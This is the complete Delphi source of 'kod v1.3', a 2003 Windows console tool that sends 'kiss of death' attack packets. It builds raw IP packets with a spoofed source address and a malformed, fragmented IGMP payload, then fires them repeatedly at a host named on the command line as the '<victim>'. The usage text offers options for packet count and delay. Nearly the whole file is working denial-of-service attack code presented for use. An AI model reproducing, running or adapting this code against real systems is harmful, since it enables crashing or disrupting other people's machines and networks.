{
  ************************************************************************
  *                                                                      *
  *    kod v1.3                                                          *
  *                                                                      *
  *    Release Date: 13 Aug 2003                                         *
  *                                                                      *
  *    http://www.loranbase.com                                          *
  *                                                                      *
  ************************************************************************
}

program kod;

{$APPTYPE CONSOLE}

uses
  Windows, Winsock;

const
  Banner = #13#10'kod v1.3 [13 Aug 2003]'#13#10#13#10 +
                 'http://www.loranbase.com'#13#10;

type
  TkodOptions = packed record
    Delay: Cardinal;
    SockAddr: TSockAddrIn;
    Num, RandomSeek, Sended: integer;
    Socket: TSocket;
  end;

  WordArray  = ^TWordArray;
  TWordArray = array [0..0] of Word;

  PIPhdr = ^TIPhdr;
  TIPhdr = packed record
    ip_verlen: Byte;
    ip_tos: Byte;
    ip_len: Word;
    ip_id: Word;
    ip_off: Word;
    ip_ttl: Byte;
    ip_p: Byte;
    ip_sum: Word;
    ip_src: Cardinal;
    ip_dst: Cardinal;
  end;

  PIGMPhdr = ^TIGMPHdr;
  TIGMPHdr = packed record
    igmp_type: Byte;
    igmp_code: Byte;
    igmp_cksum: word;
    igmp_group: cardinal;
  end;

const
  IP_MF  = $2000;
  Len    = 1500;

var
  WSAData: TWSAData;
  UseDelay: Boolean;
  Buf: array [0..Len - 1] of Char;
  IPhdr: PIPhdr = @Buf[0];
  IGMPhdr: PIGMPhdr = @Buf[20];
  kodOpt: TkodOptions;
  LastUpdate: Cardinal = 0;

function CanUpdate(const DelayValue: Cardinal; const Force: Boolean): Boolean;
begin
  Result := Force or ((GetTickCount - LastUpdate) >= DelayValue);
  if Result then LastUpdate := GetTickCount;
end;

function InttoStr(const Value: integer): string;
var
  S: string[11];
begin
  Str(Value, S);
  Result := S;
end;

function StrToIntDef(const S: string; Default: integer): integer;
var
  E: integer;
begin
  Val(S, Result, E);
  if E <> 0 then Result := Default;
end;

function ExtractFileName(const Path: string): string;
var
  i, L: integer;
  Ch: Char;
begin
  L := Length(Path);
  for i := L downto 1 do
  begin
    Ch := Path[i];
    if (Ch = '\') or (Ch = '/') then
    begin
      Result := Copy(Path, i + 1, L - i);
      Break;
    end;
  end;
end;

function CheckSum(data: WordArray; size: Integer): Word;
var
  i, sum: Integer;
begin
  sum := 0;
  i := 0;
  while size > 1 do begin
    Inc(sum, data^[i]);
    Dec(size, 2);
    Inc(i);
  end;
  if size <> 0 then
    Inc(sum, data^[i]);
  sum := (sum shr 16) + (sum and $ffff);
  Inc(sum, sum shr 16);
  Result := not sum;
end;

function getRandomValue(const Range: Integer): Integer; // function for getting different random
begin                                                   // values between very short times
  kodOpt.RandomSeek := (kodOpt.RandomSeek xor Range) + 1;
  Result := (Random(High(Integer)) xor kodOpt.RandomSeek) mod Range;
end;

function Resolve(const host: PChar): Cardinal; // function for resolving host to ip
var
  InAddr: TInAddr;
  HostEnt: PHostEnt;
begin
  InAddr.S_addr := inet_addr(host); // convert ip address format (ex: 127.0.0.1) to cardinal
  if InAddr.S_addr = INADDR_NONE then // if it is not a ip address then resolve it
  begin
    HostEnt := GetHostByName(host);
    if not Assigned(HostEnt) then // if couldn't resolve the host then exit
    begin
      Writeln('Error: Unable to resolve host: ' + host);
      Halt(0);
    end;
    Move((HostEnt^.h_addr_list^)^, InAddr.S_addr, HostEnt^.h_length); // move resolved host to InAddr.S_addr
  end;
  Result := InAddr.S_addr;
end;

procedure createSocket;
begin
  kodOpt.Socket := Socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
  if kodOpt.Socket = INVALID_SOCKET then
  begin
    Writeln('Error on creating socket');
    Halt(0);
  end;
  if SetSockOpt(kodOpt.Socket, IPPROTO_IP, 2, '1', 4) <> 0 then
  begin // if can't set the IP_HDRINCL option then exit
    Writeln('Error: IP_HDRINCL'#13#10 +
            '(Note that this program only works on Windows XP)');
    Halt(0);
  end;
end;

procedure send_kod;

  procedure SubSend(const size: integer);
  begin
    IPhdr.ip_sum := 0;
    IPhdr.ip_sum := CheckSum(@IPhdr^, 20);
    Sendto(kodOpt.Socket, Buf, size, 0, kodOpt.SockAddr, Sizeof(kodOpt.SockAddr));
  end;

  procedure send_kod_SetIGMPhdr;
  begin
    IGMPhdr.igmp_type := 2;
    IGMPhdr.igmp_code := 31;
    IGMPhdr.igmp_group := inet_addr('128.1.1.1');
  end;

  procedure send_kod_SetIPhdr;
  begin
    IPhdr.ip_verlen := $45;
    IPhdr.ip_id := 69;
    IPhdr.ip_ttl := 255;
    IPhdr.ip_p := 2;
    IPhdr.ip_src := $7FFA2560;
    IPhdr.ip_dst := kodOpt.SockAddr.sin_addr.S_addr;
  end;
  
begin
  FillChar(Buf, Sizeof(Buf), 0);
  FillChar(Buf[28], Len - 28, 'A');
  send_kod_SetIPhdr;
  send_kod_SetIGMPhdr;
{ Packet 1 }
  IPhdr.ip_len := htons(1500);
  IPhdr.ip_off := htons(IP_MF);
  SubSend(Len);
{ Packet 2 }
  IPhdr.ip_off := htons(185) or htons(IP_MF);
  SubSend(Len);
{ Packet 3 }
  IPhdr.ip_off := htons(720) or htons(IP_MF);
  SubSend(Len);
{ Packet 4 }  
  IPhdr.ip_len := htons(831);
  IPhdr.ip_off := htons(925);
  SubSend(831);
end;

procedure setDefaultOptions;
begin
  kodOpt.SockAddr.sin_addr.S_addr := Resolve(PChar(ParamStr(1)));
  kodOpt.SockAddr.sin_family := AF_INET;
  kodOpt.SockAddr.sin_port := GetRandomValue(High(Word)) + 1;
end;

procedure setParams; // procedure for setting optional parameters
var
  i, pcount: Integer;
  pstr: string;
  Ch: Char;
begin
  pcount := ParamCount;
  for i := 2 to pcount do
  begin
    pstr := ParamStr(i);
    Ch := #0;
    if Length(pstr) = 2 then
    begin
      if pstr[1] = '-' then
        Ch := pstr[2];
    end;
    if Ch = #0 then Continue;
    case Ch of
      'n' : kodOpt.Num := StrtoIntDef(ParamStr(i + 1), 0);
      'd' : kodOpt.Delay := StrtoIntDef(ParamStr(i + 1), 0);
    end;
  end;
end;

procedure Usage(const Path: string);
begin
  Write(
        'usage: ' + Path + ' <victim> [options]'#13#10#13#10 +
        'Options:'#13#10 +
        '  -n:    Num of packets to send (0 is continuous (default))'#13#10 +
        '  -d:    Delay (in ms)          (default 0)'#13#10
       );
  Halt(0);
end;

begin
  Writeln(Banner);
  if ParamCount < 1 then
    Usage(ExtractFileName(ParamStr(0)));
  WSAStartUp($0101, WSAData);
  FillChar(kodOpt, Sizeof(kodOpt), 0);
  CreateSocket;
  try
    Randomize;
    SetDefaultOptions;
    if ParamCount > 2 then
      SetParams;
    UseDelay := kodOpt.Delay > 0;
    repeat
      send_kod;
      Inc(kodOpt.Sended);
      if CanUpdate(50, kodOpt.Sended = kodOpt.Num) then
        SetConsoleTitle(PChar('Count: ' + InttoStr(kodOpt.Sended)));
      if UseDelay then
        Sleep(kodOpt.Delay);
    until
      kodOpt.Sended = kodOpt.Num;
  finally
    CloseSocket(kodOpt.Socket);
    WSACleanUp;
  end;
end.
